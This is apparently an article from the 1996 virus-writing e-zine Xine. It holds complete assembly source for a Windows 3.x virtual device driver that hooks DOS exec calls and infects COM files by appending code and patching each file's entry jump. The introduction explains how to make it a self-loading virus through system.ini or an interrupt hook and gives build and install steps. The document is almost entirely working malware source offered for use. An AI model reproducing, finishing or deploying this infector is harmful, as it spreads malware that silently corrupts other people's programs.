home *** CD-ROM | disk | FTP | other *** search
/ HPAVC / HPAVC CD-ROM.iso / XINE-1.ZIP / XINE-1.006 < prev    next >
Text File  |  1996-10-25  |  10KB  |  306 lines
  1.  
  2.                                         /-----------------------------\
  3.                                         | Xine - issue #1 - Phile 006 |
  4.                                         \-----------------------------/
  5.  
  6. JHB presents:
  7.  
  8.         infections by VxD
  9.  
  10.   Well yes just as tsr's are to dos as VxD's to windows  they offer an
  11. amazing power and most probaly 90 percent will never know a VxD has been
  12. added.  This example shows how a VxD can modify com files and do it fast.
  13. To make a true virus you would need to add a method to get the vxd in
  14. memory. Infecting a command file and hooking the int 2f you can watch
  15. and wait till windows yells out "hey Look out I am loading" at this time
  16. you can make the vxd tell windows to load it. Another I feel may be easier
  17. is to modifiy the system.ini to load it.  But those are otherbridges to
  18. cross... 
  19.  
  20.  
  21. ;well lets be honest I use a source code as a frame to build this
  22. ;example, I did make the int 21 hook and the other stuff but thats
  23. ;just modified virus ideas from regular dos virii.
  24. ;to test just ad the line in the system.ini in the
  25. ;[386Enh]
  26. ;device=vvmd.386
  27. ;oh yea you need the masm5.1 and the device driver kit for windows3.X
  28. ;to assembly this if any one finds another way to assembly this please
  29. ;let me know.
  30. ;
  31. ;************************************************************************
  32. TITLE VVD.ASM - Virtual Virus Device
  33. ;
  35. ;problem if ifshlp is loaded in the config.sys windows
  36. ;refuse to loads no error just returns to the c:\   only happen on one
  37. ;system not sure why
  39. ;************************************************************************
  40.  
  41.         .386p
  42.  
  43.  
  44. ;************************************************************************
  45. ;                             I N C L U D E S
  46. ;************************************************************************
  47.  
  48.         .XLIST
  49.         INCLUDE VMM.Inc
  50.         .LIST
  51.  
  52. ;************************************************************************
  53. ;                V I R T U A L   D E V I C E   D E C L A R A T I O N
  54. ;************************************************************************
  55.  
  56. Declare_Virtual_Device VVD, 3, 0, VVD_Control, TSRLoad_Device_ID, \
  57.                        Undefined_Init_Order, ,
  58.  
  59.  
  60. ;************************************************************************
  61. ;                  I N I T I A L I Z A T I O N   D A T A
  62. ;************************************************************************
  63.  
  64. VxD_DATA_SEG
  65.  
  66. pFn             dd      ?
  67. VVD_RW_BUFF     db      32h dup (0)
  68. SysFile        db    "WIN.COM"
  69.         db    9 dup (0)
  70. SysFileLen      dw      8
  71.  
  72. hFILE           DW      ?
  73.  
  74. NEW_JMP         DB      0E9H
  75. Fsize           DW      ?
  76. MARKER          DB      "V"
  77.  
  78. V_HOST          db      0c7h, 06, 00, 01          ;MOV WORD PTR [100],
  79. FIRST_WORD      DW      ?                         ;
  80.                 DB      0C7H, 06, 02, 01          ;MOV WORD PTR [102],
  81. SECOND_WORD     DW      ?                         ;
  82.                 DB      068H, 00, 01              ;PUSH 0100
  83.                 DB      0C3H                      ;RET
  84. SIZE_V          DW      0010H
  85. VxD_DATA_ENDS
  86.  
  87. ;************************************************************************
  88. ;             R E A L   M O D E   I N I T I A L I Z A T I O N
  89. ;************************************************************************
  90.  
  91. VxD_REAL_INIT_SEG
  92.  
  93. BeginProc VVD_Real_Mode_Init
  94.  
  95.         xor     bx, bx                  ;nothing to do here
  96.         xor     si, si                  ;except tell windows that
  97.         mov     ax, Device_Load_Ok      ;everything's ok
  98.         ret
  99.  
  100. EndProc VVD_Real_Mode_Init
  101.  
  102. VxD_REAL_INIT_ENDS
  103.  
  104. ;*************************************************************************
  105. ;              D E V I C E   C O N T R O L   P R O C E D U R E
  106. ;*************************************************************************
  107.  
  108. VxD_CODE_SEG
  109.  
  110. BeginProc VVD_Control
  111.  
  112.         Control_Dispatch Device_Init, VVD_Device_Init
  113.         Control_Dispatch Init_Complete, VVD_Init_Complete
  114.  
  115.         clc                          ; Ignore other control calls
  116.         ret
  117.  
  118. EndProc VVD_Control
  119.  
  120. VxD_CODE_ENDS
  121.  
  122.  
  123. ;*************************************************************************
  124. ;                   I N I T I A L I Z A T I O N   C O D E
  125. ;*************************************************************************
  126.  
  127. VxD_ICODE_SEG
  128.  
  129. BeginProc VVD_Device_Init
  130.  
  131.         mov     eax,21H                 ;hook V86 int 21 handler
  132.         mov     esi,OFFSET32 int_21handler
  133.         VMMcall Hook_V86_Int_Chain
  134.         clc                             ;say everything's clear
  135.         ret
  136.  
  137. EndProc VVD_Device_Init
  138.  
  139. BeginProc VVD_Init_Complete
  140.  
  141.         clc                             ;say everything's clear
  142.         ret
  143.  
  144. EndProc VVD_Init_Complete
  145.  
  146. VxD_ICODE_ENDS
  147.  
  148. VxD_CODE_SEG
  149.  
  150. ;*************************************************************************
  151. ;                   V86 I N T E R R U P T   H A N D L E R S
  152. ;*************************************************************************
  153.  
  154. ;*************************************************************************
  155. ;
  156. ;   int_21handler
  157. ;
  158. ;   DESCRIPTON: aTTEMPTS TO DETERMINE IF THE FILE IS A COM FILE IF SO
  159. ;               ADD SOME MARKER AT THE END
  160. ;               pass that point the com file is modified to
  161. ;               jmp to the end then return after restoring the host
  162. ;               
  163. ;
  164. ;=========================================================================
  165. ;NOTE IT APPEARS THAT ON ENTRY TO HERE EBP -> TO THE CRS (REGS STRUCTURE)
  166. ;WHILE                                 EBX -> THE VM HANDLE
  167. ;NOTE SURE IF THE EBX IS A POINTER BUT i AM ASSUMING IT IS AT THIS TIME
  168. ;TO MAKE LIFE EASIER
  169. ;SEEMS MY GUESS IS WRONG
  170. ;
  171. ;The system calls the procedure as follows:
  172. ;
  173. ;    mov     eax, Interrupt      ; number of interrupt hooked
  174. ;    mov     ebx, VM             ; current VM handle
  175. ;    mov     ebp, OFFSET32 crs   ; points to a Client_Reg_Struc
  176. ;    call    [HookProc]
  177.  
  178.  
  179.  
  180. BeginProc int_21handler
  181.         cmp     [ebp.Client_AX],4b00h            ;the exec call
  182.         jne     REFLECT_21
  183.  
  184.  
  185.         Push_Client_State          ;RESTORES THE CLIENT_IP_REG AND CS
  186.         VMMcall Begin_Nest_Exec    ;RESTORES THE CLIENT REGS  
  187.  
  188.     movzx    edx, [ebp.Client_DS]    ; get offset to file name
  189.     shl    edx, 4
  190.     movzx    eax, [ebp.Client_DX]
  191.     add    edx, eax
  192.     add    edx, [ebx.CB_High_Linear]
  193.         mov     [pFn], edx
  194.  
  195.         ;  if win.com  do not infect
  196.     push    edi
  197.         mov     edi, edx                        ; file name
  198.     mov    ecx, 128
  199.     mov    al, 0
  200.         repne   scasb                            
  201.     dec    edi
  202.  
  203. i21_90:    dec    edi
  204.     cmp    byte ptr [edi], '\'
  205.     je    short i21_100
  206.     cmp    byte ptr [edi], '/'
  207.     je    short i21_100
  208.     cmp    byte ptr [edi], ':'
  209.     je    short i21_100
  210.     cmp    edi, edx
  211.     jb    short i21_100
  212.     jmp    short i21_90
  213.  
  214. i21_100:    inc    edi            ; see if they match
  215.     mov    esi, offset32 [SysFile]
  216.     movzx    ecx, [SysFileLen]
  217.     repe    cmpsb
  218.     pop    edi
  219.         jz      EXIT_I21                   ; win.com do not play with
  220.  
  221.         mov     eax, 3D22h                 ; open file
  222.     VxDint    21h
  223.         jnc     file_open
  224.         jmp     EXIT_I21                   ;  error on open
  225.  
  226. file_open:
  227.         MOV     word ptr [hFile],AX             ;YEA OLD SAVE FILE  
  228.         MOV     EBX,EAX                         ;HANDLE
  229.  
  230.     mov    eax, 3F00h            ; read MZ
  231.         mov     ecx, 2                          ;assume if not MZ
  232.         lea     edx, FIRST_WORD                ;its a com file
  233.         VxDint  21h                             ;
  234.         jc      EXIT_I21                        ;
  235.         cmp     word ptr [FIRST_WORD], 5A4Dh   ;
  236.         je      close_EXIT_I21                  ;
  237.  
  238.         mov     eax, 3F00h                      ; read next two bytes
  239.         mov     ecx, 2                          ;assume if not MZ
  240.         lea     edx, SECOND_WORD                ;its a com file
  241.         VxDint  21h                             ;
  242.         jc      EXIT_I21                        ;
  243.         cmp     BYTE ptr [SECOND_WORD+1],"V"  ;
  244.         je      close_EXIT_I21                  ;
  245.  
  246.  
  247.  
  248.         mov     eax, 4202h                      ; seek to end
  249.     xor    ecx, ecx
  250.         mov     edx, ecx
  251.     VxDint    21h
  252.         jc      close_EXIT_I21
  253.  
  254.         CMP     DX,0                            ;FILE IS TOO BIG
  255.         JNE     close_EXIT_I21                  ;GET OUT OF HERE
  256.  
  257.         DEC     EAX                             ;adjust the file size
  258.         DEC     EAX                             ;for the jmp
  259.         DEC     EAX                             ;
  260.         MOV     [Fsize],AX                      ;SAVE THE FILE_SIZE
  261.  
  262.         MOV     EAX,4000H                       ;WRITE THE V_HOST
  263.         MOV     ECX, 10H                        ;
  264.         lea     EDX, V_HOST                     ;
  265.         VxDint  21h                             ;
  266.  
  267.         mov     eax, 4200h                      ; seek to end
  268.     xor    ecx, ecx
  269.         mov     edx, ecx
  270.     VxDint    21h
  271.         jc      close_EXIT_I21
  272.  
  273.  
  274.         MOV     EAX,4000H                       ;WRITE THE  
  275.         MOV     ECX, 4                          ;NEW JMP
  276.         lea     EDX, NEW_JMP                    ;
  277.         VxDint  21h                             ;
  278.  
  279.  
  280. close_EXIT_I21:
  281.  
  282.         mov     bx, [hFile]                 ; close file
  283.         mov     eax, 3E00h
  284.     VxDint    21h
  285.         
  286.  
  287.  
  288.  
  289. EXIT_I21:
  290.         VMMcall End_Nest_Exec      ;RESTORES THE CLIENT_IP_REG AND CS
  291.         Pop_Client_State           ;RESTORES THE CLIENT REGS
  292.  
  293.  
  294.                                                   
  295.  
  296. REFLECT_21:          ;reflect interrupt to next VxD or to V86 handler
  297.         stc
  298.         ret
  299.  
  300. EndProc int_21handler
  301.  
  302. VxD_CODE_ENDS
  303.  
  304.  
  305.         END VVD_Real_Mode_Init
  306.